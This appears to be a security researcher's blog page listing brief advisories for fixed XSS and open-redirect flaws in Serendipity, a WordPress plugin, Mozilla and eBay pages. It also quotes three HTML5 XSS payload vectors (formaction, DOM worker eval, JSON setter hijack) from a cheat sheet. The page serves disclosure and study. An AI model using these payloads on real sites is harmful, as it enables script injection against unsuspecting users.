Advisory:
Serendipity 1.7.5 (Backend) – Multiple security vulnerabilities
Advisory ID:
SSCHADV2014-003
Author:
Stefan Schurtz
Affected Software:
Successfully tested on Serendipity 1.7.5
Vendor URL :
Vendor Status:
fixed
======================
Vulnerability Description
======================
The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities
Continue reading "SSCHADV2014-003 - Serendipity 1.7.5 (Backend) - Multiple security vulnerabilities"
Posted by on Saturday, January 11. 2014
In Dec ’13 I reported a Open Redirect (and two other vulnerabilities, first in Nov ’13) to the Yahoo Bug Bounty Program . Sadly, I’ve got no response or feedback for any of this issues, so I wrote a new message to them (this time via email).
Last week they told me that Open redirects are no longer in scope of the bug bounty programm :-/
So here is my advisory for this issue:
Continue reading "Yahoo Bug Bounty Program Vulnerability #2 Open Redirect"
Advisory:
Wordpress Plugin WP-Members 2.8.9 – Multiple Cross-site Scripting vulnerabilities
Advisory ID:
SSCHADV2014-001
Author:
Stefan Schurtz
Affected Software:
Successfully tested on WP-Members Version 2.8.9
Vendor URL :
Vendor Status:
fixed
======================
Vulnerability Description
======================
The Wordpress plugin "WP-Members 2.8.9" is prone to reflected and stored XSS vulnerabilities
Continue reading "SSCHADV2014-001 - Wordpress Plugin WP-Members Version 2.8.9 - Stored and reflected Cross-site Scripting vulnerabilities"
Posted by on Sunday, December 8. 2013
Advisory:
developer.mozilla.org - DOM based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-010
Author:
Stefan Schurtz
Affected Software:
Successfully tested on developer.mozilla.org
Vendor URL:
Vendor Status:
fixed
==========================
Vulnerability Description
==========================
The website ' developer.mozilla.org ' is prone to a DOM based XSS vulnerability
Continue reading "SSCHADV2013-010 - developer.mozilla.org DOMbased Cross-site Scripting vulnerability"
Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.
For Example:
XSS via formaction – requiring user interaction (1)
A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form
<form id ="test" ></form> <button form="test" formaction="javascript:alert(1)" > X</button>
Self-including DOM Worker XSS
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
0 ?<script>Worker( "#" ) .onmessage =function ( ) eval ( .data ) </script> :postMessage( importScripts( ‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’ ) )
Self-hijacking JSON literals
In case parts of a JSON literal are controlled by user input there’s a risk to allow auto-harvesting values from later object members.
<script>[ { ‘a’ :Object.prototype .defineSetter ( ‘b’ ,function ( ) { alert ( arguments[ 0 ] ) } ) ,‘b’ :[ ‘secret’ ] } ] </script>
Advisory:
pages.ebay.de – DOM based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-011
Author:
Stefan Schurtz
Affected Software:
Successfully tested on pages.ebay.de
Vendor URL :
Vendor Status:
fixed
======================
Vulnerability Description
======================
The website ‘pages.ebay.de’ is prone to a DOM based XSS vulnerability
Continue reading "SSCHADV2013-011 - pages.ebay.de - DOM based Cross-site Scripting vulnerability"